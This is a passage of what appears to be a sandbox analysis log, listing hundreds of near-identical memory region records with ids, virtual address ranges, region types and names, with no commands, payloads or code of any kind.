= 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14687 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14688 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14691 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14692 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14696 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14697 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14710 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14711 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14712 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14713 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14714 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14715 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14716 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14717 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14718 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14719 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14730 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14731 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14755 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14756 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14757 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14780 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14781 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14782 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14783 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14800 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14801 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14810 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14811 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14862 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14863 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 